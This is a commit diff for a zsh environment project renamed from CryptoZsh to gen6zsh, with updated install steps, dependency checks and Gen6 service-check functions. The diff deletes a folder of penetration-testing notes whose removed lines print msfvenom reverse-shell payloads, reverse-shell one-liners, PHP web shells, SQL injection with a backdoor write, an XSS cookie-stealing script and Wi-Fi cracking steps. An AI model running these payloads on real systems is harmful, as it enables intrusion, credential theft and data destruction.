G6_Networks
/
gen6zsh
forked from six/CryptoZSH
4
0
Fork 0
Code Pull Requests Activity

Gen6 tools

master
six 2025-04-14 11:59:54 +07:00
parent 18eb86ebfd
commit f285d6831f
32 changed files with 95 additions and 773 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
README.md
View File

@ -1,4 +1,4 @@
CryptoZsh
gen6zsh
====
The aim of this project is to create a zsh environment for users who work with: cryptocurrencies, blockchain projects and crytpography itself.
@ -6,6 +6,7 @@ The aim of this project is to create a zsh environment for users who work with:
Tools and Functions inside /draft/
====
- Check state of Gen6 services
- Random generation rules
- Network crypto tools
- Logical note taking with linking
@ -21,8 +22,12 @@ Commands calling functions:
Installing
====
cd /tmp/
git clone https://git.hsbp.org/Awalcon/CryptoZsh
cp CryptoZsh/zsh_files/.zshrc ~/
cp -R CryptoZsh/zsh_files ~/.cryptozsh
cp -R CryptoZsh/tools ~/.cryptozsh_tools
```
cd /tmp/ && git clone https://git.hsbp.org/G6_Networks/gen6zsh && cd gen6zsh && mkdir ~/.gen6zsh && cp zsh_files/* ~/.gen6zsh && mv ~/.gen6zsh/zshrc ~/.zshrc && cp -R tools ~/.gen6zsh_tools
```
Check dependencies:
```
zsh /tmp/gen6zsh/dependency_check.zsh
```

28
dependency_check.zsh
View File

@ -1,16 +1,32 @@
#!/bin/zsh
function chkdep {
# Dependency check for gen6zsh
echo "Checking dependencies..."
chkdep() {
# Web n code
type python3 >/dev/null 2>&1 || { echo >&2 "python is missing."; }
type wget >/dev/null 2>&1 || { echo >&2 "wget is missing."; }
type websocat >/dev/null 2>&1 || { echo >&2 "wget is missing."; }
# G6 Substrate
# SS58 Converter: http://github.com/shamilsan/ss58.org
type subkey >/dev/null 2>&1 || { echo >&2 "wget is missing."; }
type openssl >/dev/null 2>&1 || { echo >&2 "openssl is missing."; }
type john >/dev/null 2>&1 || { echo >&2 "john is missing."; }
type curl >/dev/null 2>&1 || { echo >&2 "curl is missing."; }
# General tools
type rar >/dev/null 2>&1 || { echo >&2 "rar is missing."; }
type zip >/dev/null 2>&1 || { echo >&2 "zip is missing."; }
type unzip >/dev/null 2>&1 || { echo >&2 "unzip is missing."; }
type tor >/dev/null 2>&1 || { echo >&2 "tor is missing."; }
type torsocks >/dev/null 2>&1 || { echo >&2 "torsocks is missing."; }
type traceroute >/dev/null 2>&1 || { echo >&2 "traceroute is missing."; }
type curl >/dev/null 2>&1 || { echo >&2 "curl is missing."; }
#secu
#type john >/dev/null 2>&1 || { echo >&2 "john is missing."; }
#type aircrack-ng >/dev/null 2>&1 || { echo >&2 "aircrack is missing."; }
#type tor >/dev/null 2>&1 || { echo >&2 "tor is missing."; }
#type torsocks >/dev/null 2>&1 || { echo >&2 "torsocks is missing."; }
}
chkdep()
chkdep

102
tools/bcp.py
View File

@ -1,102 +0,0 @@
#!/usr/bin/python3
import hashlib
import random
import sys
## That part was originally secrets.py --> now bcp is integrated into a single file program
"""Generate cryptographically strong pseudo-random numbers suitable for
managing secrets such as account authentication, tokens, and similar.
See PEP 506 for more information.
https://www.python.org/dev/peps/pep-0506/
Amit nem hasznalok belole azt kivettem!
Eredeti forras: https://raw.githubusercontent.com/python/cpython/3.7/Lib/secrets.py
"""
__all__ = ['choice', 'randbelow', 'randbits', 'SystemRandom',
'token_bytes', 'token_hex', 'token_urlsafe',
'compare_digest',
]
import base64
import binascii
import os
from hmac import compare_digest
from random import SystemRandom
_sysrand = SystemRandom()
randbits = _sysrand.getrandbits
choice = _sysrand.choice
DEFAULT_ENTROPY = 64 # number of bytes to return by default
def token_bytes(nbytes=None):
"""Return a random byte string containing *nbytes* bytes.
>>> token_bytes(16) #doctest:+SKIP
b'\\xebr\\x17D*t\\xae\\xd4\\xe3S\\xb6\\xe2\\xebP1\\x8b'"""
if nbytes is None:
nbytes = DEFAULT_ENTROPY
return os.urandom(nbytes)
def token_hex(nbytes=None):
"""Return a random text string, in hexadecimal.
>>> token_hex(16) #doctest:+SKIP
'f9bf78b9a18ce6d46a0cd2b0b86df9da'"""
return binascii.hexlify(token_bytes(nbytes)).decode('ascii')
## End of integrated secrets.py
# Az egyszeruseg kedveert, 1 tomb = 1 sor
blokklanc_file = os.getenv("HOME") + "/.blokklanc.pp"
# Eredet tomb letrehozasa ha nem letezik
if not os.path.exists(blokklanc_file):
# Genezis/eredet tomb letrehozasa randommal, hogy ha ugyan az is ket szoveg, soha ne ugyan az legyen a kimenetel
eredet = "Eredet."
erand = token_hex(64)
etomb_adat = eredet + erand
etomb_hash = hashlib.sha512(etomb_adat.encode('utf-8')).hexdigest()
print("Initializing...")
print("Origin block: " + str(etomb_adat) + '||' + etomb_hash)
# beirni eredetet
ask_for_write = input("Save the first block into " + blokklanc_file + "? [y/n] ")
if ask_for_write != "y":
sys.exit()
f = open(blokklanc_file,'w')
f.write(str(etomb_adat) + etomb_hash)
f.close()
# kiolvassa az utolso sort
def utolso_sor():
blokk_file = open(blokklanc_file,'r')
for sor in blokk_file:
fb_sor = sor
print("Utolsó tömb: " + fb_sor)
return fb_sor
# hozzaad egy uj tombot
def uj_tomb(tomb_adat):
utolso_tomb_hash = utolso_sor()
uj_tomb = hashlib.sha512(utolso_tomb_hash.encode('utf-8')).hexdigest() + '||' + tomb_adat + '||'
uj_tomb_hash = hashlib.sha512(uj_tomb.encode('utf-8')).hexdigest()
fu = open(blokklanc_file,'a')
fu.write('\n' + uj_tomb + uj_tomb_hash)
# ujraszamolja a blokklanc helyesseget
def teljes_lanc_ellenorzes():
pass
teljes_lanc_ellenorzes()
# Kovetkezo letrehozasa
jegyzet = input("What do you want to add to the blockchain? ")
uj_tomb(jegyzet)
#print("Teszt: " + hashlib.sha512("teszt".encode('utf-8')).hexdigest())
# cut -d '|' -f 3 blokklanc.pp | egrep -v "^Eredet."

3
tools/v3das/_n
View File

@ -1,3 +0,0 @@
#compdef n
_arguments "1: :( $(ls ~/.cryptozsh_tools/v3das/ ) )"

6
tools/v3das/coding_python_venv.txt
View File

@ -1,6 +0,0 @@
tl;dr the use of virtual env:
# #! /usr/bin/env python
# . venv/bin/activate

42
tools/v3das/communication_xmpp_mcabber.txt
View File

@ -1,42 +0,0 @@
# mcabber is a great command line client to use for chat (XMPP) with authentication and encrytpion (OTR).
# The following comments and commands will help you to install and use it.
# Register your account
# Go to jit.si for example
# Create directory for mcabber config and OTR
mkdir -p .mcabber/otr
# Copy the sample configuration files
cp /usr/share/doc/mcabber/examples/mcabberrc.example.gz ~/.
# If the files does not exist, the path may be different.
# Like "/usr/share/doc/mcabber/mcabberrc.example"
# Unzip the configuration file and rename it
gunzip mcabberrc.example.gz
mv mcabberrc.example.gz .mcabberrc
# Correct the priviliges if needed
chmod 700 .mcabber/ -R
chmod 700 .mcabberrc
# Edit your configuration with the following settings:
vim .mcabberrc
set jid = testuser@jit.si
set otr = 1
# Start mcabber and login with the account you have registered
mcabber
# Basic commands
/add user@jit.si # Request someone for chat
/event 1 accept # To accept a request
# Using OTR
# It's recommended to add OTR by default policy to your config files
/otr key # Show your fingerprint
/otr fingerprint . "AAAA AAAA AAAA ...." # Trust someon's fingerprint
/otr fingerprint # Show fingerprints you have
/otr start # Start a conversation with OTR

12
tools/v3das/linux_chroot_grub_install.txt
View File

@ -1,12 +0,0 @@
# Start a live image, then reinstall grub.
fdisk -l
mount /dev/sda2 /mnt/
mount -t proc none /mnt/proc
mount -o bind /dev /mnt/dev
mount -t sysfs sys /mnt/sys
chroot /mnt/ /bin/bash
update-grub
/usr/sbin/grub-install --recheck --no-floppy /dev/sda
sync & reboot

21
tools/v3das/linux_iptables_workstation_example.txt
View File

@ -1,21 +0,0 @@
#!/bin/bash
# Example iptables for workstation
IPT=/sbin/iptables
$IPT -F
#Policies
$IPT -P OUTPUT ACCEPT
$IPT -P INPUT DROP
$IPT -P FORWARD DROP
#Allow IN for services
$IPT -A INPUT --in-interface lo -j ACCEPT
#Allow response
$IPT -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# Block ipv6, sorry lazy to set path, its a note :)
ip6tables -P INPUT DROP 2>/dev/null
ip6tables -P FORWARD DROP 2>/dev/null
ip6tables -P OUTPUT DROP 2>/dev/null

23
tools/v3das/linux_luks_pendrive.txt
View File

@ -1,23 +0,0 @@
# CryptSetup for pendrive example
# Creation, make sure no CBC is used anymore!
cryptsetup -c aes -s 256 luksFormat /dev/sdb2
cryptsetup luksDump /dev/sdb2 # To check it!
cryptsetup luksOpen /dev/sde usb1
mkfs.vfat /dev/mapper/usb1 -n "usb1"
# Troubleshoot if needed
dmsetup ls
dmsetup ls
# Change Passphrse
cryptsetup -y luksAddKey ENCRYPTED_PARTITION
cryptsetup luksRemoveKey ENCRYPTED_PARTITION
# Mount and unmount
cryptsetup luksOpen /dev/sdb2 usb1
mount /dev/mapper/usb1 /mnt
umount /mnt/point

64
tools/v3das/linux_zfs_debian7.txt
View File

@ -1,64 +0,0 @@
# How to create ZFS mirroring on Debian 7 / Old notes!
# Information were gathered from the following sites:
# http://zfsonlinux.org/debian.html
# http://www.zfsbuild.com/2010/06/03/howto-create-mirrored-vdev-zpool/
# http://allgood38.io/setting-up-a-basic-linux-zfs-instance.html
# https://help.ubuntu.com/community/encryptedZfs
# http://linux.arantius.com/installing-gentoo-into-a-luks-encrypted-zfs-root
#
# CheatSheet: http://lildude.co.uk/zfs-cheatsheet
# Get ZFS On Linux debian package, install it and add their GPG key to APT
su
wget http://archive.zfsonlinux.org/debian/pool/main/z/zfsonlinux/zfsonlinux_8_all.deb
dpkg -i zfsonlinux_8_all.deb
wget http://zfsonlinux.org/4D5843EA.asc -O - | apt-key add -
# Install ZFS using APT
apt-get update
apt-get install debian-zfs
# Create LUKS encrypted volumes
cryptsetup luksFormat /dev/sdc
cryptsetup luksFormat /dev/sdd
# Open luks encrypted devices - those will be mirrored
cryptsetup luksOpen /dev/sdc luk1
cryptsetup luksOpen /dev/sdd luk2
# Create the mirror pool using the opened luks devices
# WARNING
# THIS DESTROYES YOUR EXISTING POOL IF YOU ALREADY HAVE ONE!
zpool create -m none -O compression=lz4 m_pool mirror luk1 luk2
# -m mountpoint -O
# END OF CREATION
# Done!
# The following part is required for mounting/opening our ZFS mirror.
# Import the pool if it's not already
zpool import m_pool
# Mount it manually
zfs set mountpoint=/mpool m_pool
# Checks
zpool list
zpool iostat
zpool status
--------
# Finally change privileges if needed
chown -R storager:storager /mpool
# Create ZFS filesystem
zfs create tank/testfs
--------
# Destory
zpool destroy m_pool

17
tools/v3das/metasploit_meterpreter_pivoting.txt
View File

@ -1,17 +0,0 @@
# With "autoroute" it is possible to attack through the remote machine.
# Start handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.1.1.1
# Add route to which network you want to look into
run autoroute -s 10.2.2.0/24
run autoroute -p
# Scan
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.2.2.0/24
set THREADS 50
set ports 20,21,22,25,53,69,80,139,443,445,993,8080

126
tools/v3das/metasploit_msfvenom_cheatsheet.txt
View File

@ -1,126 +0,0 @@
C0nn3ctz msfvenom payload backdoor veil
List payloads
msfvenom -l
# The script way to make life more simple
theip=0.0.0.0
theport=443
Binaries and libs
=================
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf
msfvenom -p linux/x64/shell/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # STAGED, use this with msf
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # NON-STAGED
msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll
msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f macho > shell.macho
Web Payloads
============
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f war > shell.war
JavaScript
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1 -f js_le
Scripting Payloads
==================
Python
msfvenom -p cmd/unix/reverse_python LHOST=$theip LPORT=$theport -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=$theip LPORT=$theport -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=$theip LPORT=$theport -f raw > shell.pl # For Linux
msfvenom -p cmd/windows/reverse_perl=$theip LPORT=$theport -f raw > shell.pl # For Windows
Shellcode
=========
For all shellcode see msfvenom help-formats for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f <language>
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=443 -f c
msfvenom -p windows/shell/bind_tcp -f perl --smallest # Default port is 4444 and with --smallest msfvenom tries to make it small
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f <language>
Handler
=======
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD cmd/windows/powershell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 443
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler msfconsole -L -r
Persistence
===========
meterpreter > run persistence
UUID Payload
============
# Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=domainzz.com  LPORT=53 PayloadUUIDTracking=true PayloadUUIDName=HAXHAXHAXHAX -f elf > hipchat
# Setup msf listener
set payload linux/x86/meterpreter/reverse_tcp_uuid
set payloadUUIDName HAXHAXHAXHAX
set PayloadUUIDTracking true
run -j 
# Move to vict
cat hipchat.elf |ncat --ssl -lvp 53
nc --ssl domainzz.com 53 > /sbin/lister
chmod +x /sbin/lister
# crontab alternatively:
if ps aux|grep /sbin/hipchat |grep -v grep; then sleep 1 ; else /sbin/hipchat ; fi

16
tools/v3das/network_iptables.txt
View File

@ -1,16 +0,0 @@
#!/bin/bash
# Desktop example -> just like in the LWHP repo
IPT=/sbin/iptables
$IPT -F
#Policies
$IPT -P OUTPUT ACCEPT
$IPT -P INPUT DROP
$IPT -P FORWARD DROP
#Allow IN for services
$IPT -A INPUT --in-interface lo -j ACCEPT
#Allow response
$IPT -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

7
tools/v3das/network_sniffing_tcpdump_examples.txt
View File

@ -1,7 +0,0 @@
tcpdump -r file.cap -vvvs 1024 -l -A host example.com | grep -i cookie
tcpdump -r file.cap -vvvs 1024 -l -A | egrep -i "host:|cookie:"
tcpdump -r file.cap -s 1024 -l -A dst domain.com
tcpdump -A # show raw data

11
tools/v3das/network_sniffing_tshark_examples.txt
View File

@ -1,11 +0,0 @@
# tshark follow stream
tshark -r <capture file> -R "<filter>" -T fields -e tcp.stream
tshark -q -r http.pcapng -z follow,tcp,ascii,1
# etc
tshark grep from http
tshark -r file.cap 'http' | egrep -i "login|pass"
tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -R'http.request.method == "GET" || http.request.method == "HEAD"'

37
tools/v3das/network_sniffing_wireshark.txt
View File

@ -1,37 +0,0 @@
C0nn3ctz sniffing wireshark network
IP address
ip.addr == 192.168.1.1
ip.src == 192.168.1.1
ip.dst == 192.168.1.1
Show only tcp port 110
tcp.port eq 110
Show only tcp and udp port 110
tcp.port eq 110 || udp.port eq 110
Follow TCP stream
tcp.stream eq 0
Show only TCP
tcp
Show only ARP
arp
Show only HTTP
http
Show only HTTP or ARP
http||arp
HTTP and ip.src
http&&ip.src==192.168.1.4
HTTP POST
http:.request.method == "POST"
etc
(ip.addr==192.168.1.0/24) and (ip.src!=192.168.1.2)and (ip.dst!=192.168.1.4)

7
tools/v3das/network_switch_cisco_reset.txt
View File

@ -1,7 +0,0 @@
# reset a cisco switch
flash_init
dir flash:
rename flash:config.text flash:config.backup
boot

75
tools/v3das/network_wireless_cracking_aircrack.txt
View File

@ -1,75 +0,0 @@
# cracking WEP with clients
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth
aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster
aircrack-ng -0 $CAP_FILE
# cracking WEP via a client
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake auth
aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # Interactive packet reply attack
aircrack-ng -0 -z -n 64 $CAP_FILE
# clientless WEP cracking
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth
aireplay-ng -5 -b $AP_MAC -h $SELF_MAC mon0 # Fragmentation attack for PRGA
aireplay-ng -4 -b $AP_MAC -h $SELF_MAC mon0 # If Frag attack fails, use Korek ChopChop attack for PRGA
packetforge-ng -0 -a $AP_MAC -h $SELF_MAC -l $SOURCE_IP -k $DESTINATION_IP -y $XOR_FILENAME -w $PACKET_FILENAME # After got PRGA
aireplay-ng -2 -r $PACKET_FILENAME mon0 # Interactive packet reply after crafted the packet
aircrack-ng -0 $CAP_FILE
# bypassing WEP SKA
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication attack for PRGA xor file
aireplay-ng -1 60 -e $AP_ESSID -y $PRGA_FILENAME -a $AP_MAC -h $SELF_MAC mon0 # Shared key fake auth attack
aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster
aircrack-ng -0 -z -n 64 $CAP_FILE
# cracking WPA PSK
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
airacrack-ng -0 -w $WORDLIST $CAPTURE_FILE
# cracking WPA with John The Ripper
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
# change to password folder
vim john.conf # Edit "List.Rules:Wordlist" --> add regex for more words eg. "$[0-9]$[0-9]"
./john --worldlist=$WORDLIST --rules --stdout | aircrack-ng -0 -e $AP_ESSID -w $CAPTURE_FILE
# cracking WPA with coWPAtty
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
cowpatty -r $CAPTURE_FILE -f $WORDLIST -2 s $AP_ESSID
genpmk -f $WORDLIST -d HASH_FILENAME -s $AP_ESSID # Gen WPA hashes for rainbow attack
cowpatty -r $CAPTURE_FILE -d HASH_FILENAME -2 -s $AP_ESSID # Start the rainbow attack
# cracking WPA with pyrit
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
pyrit list_cores
pyrit -r $CAPTURE_FILE -i $WORDLIST -b $AP_MAC attack_passthrough
pyrit -i $WORDLIST import_password # Import the wordlist to the database
pyrit -e $AP_ESSID create_essid # Add ESSID to the database
pyrit batch
pyrit -r $CAPTURE_FILE attack_db

32
tools/v3das/shell_cheatsheet.txt
View File

@ -1,32 +0,0 @@
Shell cheatsheet
================
Bash
bash -i >& /dev/tcp/HOST/PORT 0>&1?
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc
nc -e /bin/sh 10.0.0.1 1234
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
More info and tips
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-122387
http://unix.stackexchange.com/questions/116010/meaning-of-bash-i-dev-tcp-host-port-01

41
tools/v3das/web_file_inclusion.txt
View File

@ -1,41 +0,0 @@
Local File Inclusion
====================
The %00 make php 5.3 and below ignore everything after that.
Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00
...then let's add code to the access log :)
~# nc 192.168.1.1 80
<?php echo shell_exec($_GET['cmd']);?>
...and use it
http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00
...or php shell on linux:)
<?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>
...finally send the requests to nc and exploit:
# Windows FTP upload
echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt
nc.exe -e cmd.exe 192.168.1.1  31337
- - - - - - - -
<? system('echo open 192.168.1.1 21 > ftp.txt'); ?>
<? system('echo haxor >> ftp.txt'); ?>
<? system('echo haxor >> ftp.txt'); ?>
<? system('echo bin >> ftp.txt'); ?>
<? system('echo GET nc.exe >> ftp.txt'); ?>
<? system('echo bye >> ftp.txt'); ?>
<? system('ftp -s:ftp.txt'); ?>
<? system('nc.exe -e cmd.exe 192.168.1.1  31337'); ?>
<?php phpinfo()?>
<? system("cat /etc/passwd"); ?>
<?php echo shell_exec($_GET["cmd"]);?>
<?php include="124.1.1.1" ?>
Remote file Inclusion
=====================
Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00
Note: the login.txt contains

14
tools/v3das/web_fuzz_strings.txt
View File

@ -1,14 +0,0 @@
XSS locator
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
XSS locator 2
'';!--"<XSS>=&{()}
<img src="//" onerror=alert(document.cookie);>
Other fuzzing char list
><>)()}{}][]'"`;--..\/\\//../~=-1!--?||*&&%00%0a%0d\r\n#><>}{}

11
tools/v3das/web_injection_php.txt
View File

@ -1,11 +0,0 @@
PHP command injection
=====================
There are just some ideas.
<? system('apt-get install netcat -y'); ?>
<? system('netcat 14.5.1.44 8080'); ?>
<? system('wget http://14.5.1.44:8080/'); ?>
<? system('init 6'); ?>

43
tools/v3das/web_injection_sqli.txt
View File

@ -1,43 +0,0 @@
SQLi notes
==========
Login bypass
any' or 1=1 limit 1 ;#
' OR '1' = '1 / ' OR '1' = '1
;# ;-- #
?id=737 order by 6 --> Testing max columns
?id=737 union select all 1,2,3,4,5,6 --> Testing max columns in database
?id=737 union select all 1,2,3,4,@@version,6 --> Version enumeration, commands to run or exploits?
?id=737 union select all 1,2,3,4,table_name,6 FROM information_schema.tables --> Table enumeration
?id=737 union select all 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='user' --> Column enumeration
?id=737 union select 1,2,3,4,concat(name,0x3a,password ),6 FROM users --> After knowing about "users" pull out the info
More examples
x%') #
x%') or 1=1 #
x%') order by 4 #
x%') union select all 4 #
x%') union select all 1,2,3@@version #
x%') and 1=1 #
x%') and UNION ALL SELECT LOAD_FILE(/etc/passwd) #
x%') and drop table if exists customers #
x%') and create database test #
x%') ; DROP ALL TABLES; #
@@hostname
wget -qO- http://www.site.com --user-agent=useragent --post-data="key=value"
Adding backdor.php
?id=737 union select all 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
Getting a shell with php execute
192.168.3.1/comment.php?id=737 union select all 1,2,3,4,"<? system('echo open 192.168.1.9 21 > ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo bin >> ftp.txt'); ?><? system('echo GET nc.exe >> ftp.txt'); ?><? system('echo bye >> ftp.txt'); ?>",6 into OUTFILE 'c:/xampp/htdocs/makeftp12.php'

3
tools/v3das/web_xss_cookie_stealing.txt
View File

@ -1,3 +0,0 @@
<script>new Image().src="http://192.168.1.1/bogus.php?output="+document.cookie;</script>

0
zsh_files/.zsh
View File

3
zsh_files/.zshrc
View File

@ -1,3 +0,0 @@
source ~/.cryptozsh/general.zsh
source ~/.cryptozsh/crypto.zsh
source ~/.cryptozsh/vedas.zsh

15
zsh_files/crypto.zsh
View File

@ -1,3 +1,5 @@
# If needed, run locally: https://github.com/gchq/CyberChef
# Create a temporary file random name and open it with vi
function tmp {
curran=$RANDOM$RANDOM
@ -5,25 +7,12 @@ function tmp {
vi /tmp/$curran
}
# HTTP and HTTPS response check
function chkhttpz {
# http response checks from a given host / port
echo "HTTP responses"
wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/"
echo "\nHTTPS responses"
wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/"
}
# Show certificate of website
function chkcrt {
# check ssl certificate of a server
openssl s_client -showcerts -connect $1:$2
}
# Quickly get random characters
function rnd {
# get some random characters

47
zsh_files/gen6.zsh 100755
View File

@ -0,0 +1,47 @@
# Create a temporary file random name and open it with vi
function tmp {
curran=$RANDOM$RANDOM
echo "Temporary file name: /tmp/$curran"
vi /tmp/$curran
}
# HTTP and HTTPS response check
function chkhttpz {
# http response checks from a given host / port
echo "HTTP responses"
wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/"
echo "\nHTTPS responses"
wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/"
}
# HTTP and HTTPS response check
function chkgen6 {
echo "\nHTTPS responses for Gen6 App"
wget --spider -S "https://gen6.app/" 2>&1 | grep "HTTP/"
echo "HTTP responses Gen6 LinkFree"
wget --spider -S "http://link.g6.network/" 2>&1 | grep "HTTP/"
echo "HTTP responses Gen6 LinkFree"
timeout 2 websocat -1 wss://gen6.app/node -v 2>&1 | timeout 2 grep "Connected"
}
# Show certificate of website
function chkcrt {
# check ssl certificate of a server
openssl s_client -showcerts -connect $1:$2
}
# Quickly get random characters
function rnd {
# get some random characters
cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-8};echo;
cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-16};echo;
cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-32};echo;
cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-64};echo;
}

16
zsh_files/general.zsh
View File

@ -1,19 +1,24 @@
#Aliases
alias py='python3'
alias bcp='python3 ~/.cryptozsh_tools/bcp.py'
alias python='python3'
alias ratesx='curl rate.sx'
alias hash-identifier='python3 ~/.cryptozsh_tools/hash-identifier.py'
# Add yours :)
# Menuselect and requirements for v3das (changing this might break v3das)
autoload -U compinit
compinit
zstyle ':completion:*' menu select=2
